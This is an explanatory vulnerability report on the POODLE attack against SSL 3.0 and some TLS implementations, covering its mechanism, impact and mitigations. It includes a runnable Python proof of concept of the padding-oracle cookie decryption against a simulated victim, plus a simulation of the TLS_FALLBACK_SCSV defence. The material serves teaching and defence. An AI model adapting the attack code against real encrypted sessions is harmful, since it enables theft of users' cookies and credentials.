Poodlebleed.com

Poodle Vulnerability Report - SSL3

Info: 960 words (4 pages) Report
Last Edited: 29th Aug 2022 by David Norman

System Impacted

Any system or application that uses Secure Socket Layer (SSL) 3.0 with cipher-block chaining (CBC) mode ciphers may be vulnerable. The most plausible exploitation scenario for the POODLE (Padding Oracle On Downgraded Legacy Encryption) attack, however, is a web browser talking to a web server.

The POODLE attack can also be used against some Transport Layer Security (TLS) implementations.


Description

A design flaw in the way SSL 3.0 handles block-cipher padding in CBC mode was discovered in 2014, and US-CERT is aware of it. The POODLE attack shows how an attacker can exploit this flaw to decrypt selected parts of an encrypted session and recover their contents.


The SSL 3.0 vulnerability lies in how CBC-mode ciphers pad the final block of each record: the padding bytes are not covered by the MAC, and the receiver checks only the last byte (the padding length), never the content of the padding itself. An attacker who can get a chosen ciphertext block moved into the padding position therefore learns one byte of that block's plaintext whenever the record is accepted. POODLE first forces the use of SSL 3.0 by abusing the protocol version fallback behaviour of SSL/TLS clients, then uses this padding flaw to decrypt a subset of the session's data, such as an HTTP cookie. Each recovered byte costs about 256 requests on average, so the byte-by-byte decryption generates a large number of requests between the client and server.

Although TLS has largely supplanted SSL 3.0 as the industry's preferred encryption protocol, most SSL/TLS implementations still accept SSL 3.0 for interoperability with legacy systems. The SSL/TLS handshake negotiates the protocol version in-protocol, but many clients, browsers in particular, go further: when a handshake attempt fails they retry with a lower protocol version (the "downgrade dance" of other reports), even when both client and server support a newer version of TLS. The POODLE attack exploits this client-side fallback: an attacker on the network path drops the client's TLS handshake attempts until the client falls back to SSL 3.0, and then mounts the padding attack against that connection. [1]

Two prerequisites must hold for the POODLE attack to work. The attacker must be able to influence part of the plaintext the client sends (in the browser scenario, by running JavaScript in the victim's browser that issues requests to the target site with attacker-chosen path and body lengths), and the attacker must be able to observe and modify the resulting ciphertext in transit. The usual way to obtain both is a Man-in-the-Middle (MITM) position on the network, which itself requires a separate attack to gain.

Because of these prerequisites, exploitation is not always practical. Environments where MITM attacks are already easy (public Wi-Fi, for example) remove some of those obstacles.
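The mechanism described above (padding-oracle decryption of one cookie byte per accepted forged record, driven by attacker-controlled request lengths), worked through as an added simulation. This is editorial example code, not code from Poodlebleed.com or from the POODLE researchers. It assumes a toy Feistel block cipher in place of AES, HMAC-SHA256 in place of the SSL 3.0 MAC, a fresh random IV per record in place of SSL 3.0's chained IVs, and a `Victim` class that models the browser (whose request path and body lengths the attacker's JavaScript controls) and the server sharing one session; all names are made up for the example. The receiver logic is the real SSL 3.0 weakness: the padding length is trusted and the padding bytes are never checked. `poodle_decrypt` places the target cookie byte on the last byte of a block, swaps that block into the all-padding position, and learns one byte each time the server accepts.

```python
import hashlib
import hmac
import os

BLOCK = 16   # cipher block size in bytes, as for AES-CBC
MACLEN = 32  # toy MAC is HMAC-SHA256 (SSL 3.0 used MD5/SHA-1 MACs with the same record layout)

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key, i, half):  # round function of the toy cipher (assumption: any keyed PRF works here)
    return hashlib.sha256(key + bytes([i]) + half).digest()[:8]

def block_encrypt(key, block):
    """Toy 4-round Feistel cipher on 16-byte blocks: a stand-in for AES, not secure."""
    left, right = block[:8], block[8:]
    for i in range(4):
        left, right = right, xor(left, _f(key, i, right))
    return left + right

def block_decrypt(key, block):
    left, right = block[:8], block[8:]
    for i in reversed(range(4)):
        left, right = xor(right, _f(key, i, left)), left
    return left + right

def cbc_encrypt(key, iv, pt):
    out, prev = [], iv
    for j in range(0, len(pt), BLOCK):
        prev = block_encrypt(key, xor(pt[j:j + BLOCK], prev))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key, iv, ct):
    blocks = [iv] + [ct[j:j + BLOCK] for j in range(0, len(ct), BLOCK)]
    return b"".join(xor(block_decrypt(key, cur), prev) for prev, cur in zip(blocks, blocks[1:]))

def ssl3_seal(enc_key, mac_key, data):
    """Sender: data || MAC || pad bytes || padlen, minimal padding as in SSL 3.0; the pad
    bytes are arbitrary and not covered by the MAC. Returns iv || ciphertext (a fresh
    random IV stands in for SSL 3.0's chaining of the IV across records)."""
    body = data + hmac.new(mac_key, data, hashlib.sha256).digest()
    padlen = (BLOCK - 1 - len(body)) % BLOCK
    body += os.urandom(padlen) + bytes([padlen])
    iv = os.urandom(BLOCK)
    return iv + cbc_encrypt(enc_key, iv, body)

def ssl3_open(enc_key, mac_key, record):
    """Receiver: True if the record is accepted. The SSL 3.0 flaw: padlen is read from the
    last decrypted byte and the pad bytes are never checked, so a forged final block is
    accepted whenever its last byte happens to decrypt to BLOCK-1."""
    pt = cbc_decrypt(enc_key, record[:BLOCK], record[BLOCK:])
    padlen = pt[-1]
    if padlen >= BLOCK or len(pt) < padlen + 1 + MACLEN:
        return False
    body = pt[:len(pt) - padlen - 1]
    expect = hmac.new(mac_key, body[:-MACLEN], hashlib.sha256).digest()
    return hmac.compare_digest(body[-MACLEN:], expect)

class Victim:
    """Browser and server sharing one session key. The attacker's JavaScript in the browser
    chooses the request path (prefix) and POST body (suffix) lengths; the browser adds the
    cookie (secret) between them. The attacker also sits on the wire (MITM)."""

    def __init__(self, secret):
        self.enc_key, self.mac_key, self.secret = os.urandom(16), os.urandom(16), secret
        self.requests = 0

    def client_request(self, prefix_len, suffix_len):
        self.requests += 1
        data = b"/" * prefix_len + self.secret + b"&" * suffix_len
        return ssl3_seal(self.enc_key, self.mac_key, data)

    def server_accepts(self, record):
        return ssl3_open(self.enc_key, self.mac_key, record)

def poodle_decrypt(victim, secret_len, max_tries=20000):
    """Attacker: recover secret_len cookie bytes, about 256 requests per byte on average."""
    recovered = bytearray()
    for k in range(secret_len):
        p = (BLOCK - 1 - k) % BLOCK               # put secret[k] on the last byte of a block
        s = (-(p + secret_len + MACLEN)) % BLOCK  # data||MAC fills whole blocks, so the final block is all padding
        i = (p + k) // BLOCK                      # index of the ciphertext block C_i holding secret[k]
        for _ in range(max_tries):
            rec = victim.client_request(p, s)
            c = [rec[j:j + BLOCK] for j in range(0, len(rec), BLOCK)]  # c[0] is the IV, c[j+1] is C_j
            forged = b"".join(c[:-1]) + c[i + 1]  # move C_i into the padding block's position
            if victim.server_accepts(forged):
                # accepted => D(C_i)[15] ^ C_{n-2}[15] == BLOCK-1, and P_i[15] = D(C_i)[15] ^ C_{i-1}[15]
                recovered.append((BLOCK - 1) ^ c[-2][-1] ^ c[i][-1])
                break
        else:
            raise RuntimeError("oracle never accepted: the simulation is inconsistent")
    return bytes(recovered)
```

Calling `poodle_decrypt(Victim(b"sid=7f3a"), 8)` returns the cookie after roughly 2,000 requests; `Victim.requests` counts them, which is the traffic volume the text refers to. The same swap against a receiver that verifies every padding byte (as TLS 1.x requires) would be rejected almost every time, which is why the attack needs SSL 3.0 or an equally lax TLS implementation.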

Some TLS implementations are also susceptible to the POODLE attack; this was disclosed publicly on 8 December 2014 [2,3,4]. These implementations accept TLS records with SSL 3.0-style padding, so the padding-oracle part of the attack works against them without any downgrade to SSL 3.0.


Impact

Any system or application that supports SSL 3.0 with CBC-mode ciphers is vulnerable to the POODLE attack. This includes any program that implements the SSL/TLS protocol suite directly or links a vulnerable SSL/TLS library such as OpenSSL; at the time of disclosure that covered the majority of browsers and web sites. In the likely web-based scenario an attacker can recover sensitive information sent inside the encrypted session, including passwords, cookies and other authentication tokens, and then use it to gain broader access to the site (impersonating the user, accessing database content, and so on).


Solution

Since the vulnerability is inherent in the SSL 3.0 protocol, it cannot be patched in place; the recommended mitigation is to disable SSL 3.0 support in system and application configurations.

TLS_FALLBACK_SCSV, a protocol extension designed by some of the same researchers who found the issue, removes one of the attack's preconditions. A client includes this signalling cipher suite value whenever it retries a handshake at a lower protocol version, and a server that supports a higher version then refuses the connection, so a MITM attacker can no longer force a protocol downgrade.

OpenSSL advises the following updates, as these releases add support for TLS_FALLBACK_SCSV: [5]

  • Users of OpenSSL 1.0.1 should update to 1.0.1j.
  • Users of OpenSSL 1.0.0 should update to 1.0.0o.
  • Users of OpenSSL 0.9.8 should update to 0.9.8zc.

Both clients and servers must implement TLS_FALLBACK_SCSV for it to stop downgrade attacks: a server that does not understand the value simply ignores it, and a client that does not send it gets no protection. It also does nothing about the SSL 3.0 flaw itself; a server whose highest supported version is SSL 3.0 remains attackable, which is why disabling SSL 3.0 is still the primary fix.
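How TLS_FALLBACK_SCSV breaks the "downgrade dance", and why both sides must support it, as an added simulation. This is editorial example code, not part of the original page, of OpenSSL or of RFC 7507. The version numbers and the 0x5600 signalling value are the real wire values; the handshake is reduced to a single ClientHello/ServerHello exchange, the `Server`, `Client`, `direct` and `mitm_drop_above_ssl3` names are made up for the example, and the MITM simply drops every handshake that offers more than SSL 3.0.

```python
SSL3, TLS10, TLS11, TLS12 = (3, 0), (3, 1), (3, 2), (3, 3)   # wire version numbers
TLS_FALLBACK_SCSV = 0x5600   # signalling cipher suite value defined in RFC 7507
REAL_SUITE = 0x002F          # TLS_RSA_WITH_AES_128_CBC_SHA, a placeholder real suite


class Server:
    def __init__(self, max_version, supports_scsv=True, intolerant=False):
        self.max_version = max_version
        self.supports_scsv = supports_scsv   # pre-RFC 7507 servers just ignore the value
        self.intolerant = intolerant         # buggy server: drops hellos above its max version

    def handle_client_hello(self, version, cipher_suites):
        """Returns ('server_hello', version), ('alert', name) or None (connection dropped)."""
        if self.intolerant and version > self.max_version:
            return None
        if self.supports_scsv and TLS_FALLBACK_SCSV in cipher_suites and version < self.max_version:
            return ("alert", "inappropriate_fallback")            # RFC 7507 section 3
        return ("server_hello", min(version, self.max_version))  # normal in-protocol negotiation


class Client:
    """Browser that performs the downgrade dance: on a failed handshake it retries with
    the next lower version, and (if enabled) marks every retry with TLS_FALLBACK_SCSV."""

    def __init__(self, send_scsv=True, versions=(TLS12, TLS11, TLS10, SSL3)):
        self.send_scsv, self.versions = send_scsv, versions

    def connect(self, network):
        for attempt, version in enumerate(self.versions):
            suites = [REAL_SUITE] + ([TLS_FALLBACK_SCSV] if self.send_scsv and attempt else [])
            reply = network(version, suites)
            if reply is None:            # dropped: retry one version lower
                continue
            if reply[0] == "alert":      # explicit refusal: stop, do not dance further
                return None
            return reply[1]              # negotiated protocol version
        return None


def direct(server):
    """No attacker: the ClientHello goes straight to the server."""
    return server.handle_client_hello


def mitm_drop_above_ssl3(server):
    """Attacker on the path who drops every handshake offering more than SSL 3.0."""
    def network(version, suites):
        return None if version > SSL3 else server.handle_client_hello(version, suites)
    return network


def scenarios():
    """The cases the text describes; values are the negotiated version, or None if the
    connection fails outright (which is the safe outcome under attack)."""
    return {
        "no attacker, modern server": Client().connect(direct(Server(TLS12))),
        "MITM, client without SCSV": Client(send_scsv=False).connect(mitm_drop_above_ssl3(Server(TLS12))),
        "MITM, both sides support SCSV": Client().connect(mitm_drop_above_ssl3(Server(TLS12))),
        "MITM, server ignores SCSV": Client().connect(mitm_drop_above_ssl3(Server(TLS12, supports_scsv=False))),
        "legacy SSL3-only, version-intolerant server": Client().connect(direct(Server(SSL3, intolerant=True))),
    }
```

With both sides supporting the value the attacked connection fails rather than landing on SSL 3.0; with a server that ignores the value, or a client that never sends it, the dance still ends on SSL 3.0. The last scenario shows that the SCSV does not block a genuine legacy fallback: a server whose highest version really is SSL 3.0 accepts it, which is the case only disabling SSL 3.0 can fix.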

Other SSL 3.0 implementations are probably also affected by POODLE; contact your vendor for details. Additional vendor information is available in CERT Vulnerability Note VU#577193 [7] and the National Vulnerability Database (NVD) entry for CVE-2014-3566 [6].

Vulnerable TLS implementations must also be updated; that issue is tracked separately as CVE-2014-8730 [3], and the NVD likewise carries the CVE identifiers and vendor data for it.


References

[1] B. Möller, T. Duong, K. Kotowicz, "This POODLE Bites: Exploiting The SSL 3.0 Fallback", Google, 2014.

[2] A. Langley, "The POODLE Bites Again", ImperialViolet, 8 December 2014.

[3] "TLS1.x padding vulnerability CVE-2014-8730".

[4] A10 Networks Security Advisory.

[5] OpenSSL Security Advisory, 15 October 2014.

[6] NVD, Vulnerability Summary for CVE-2014-3566.

[7] CERT/CC Vulnerability Note VU#577193.

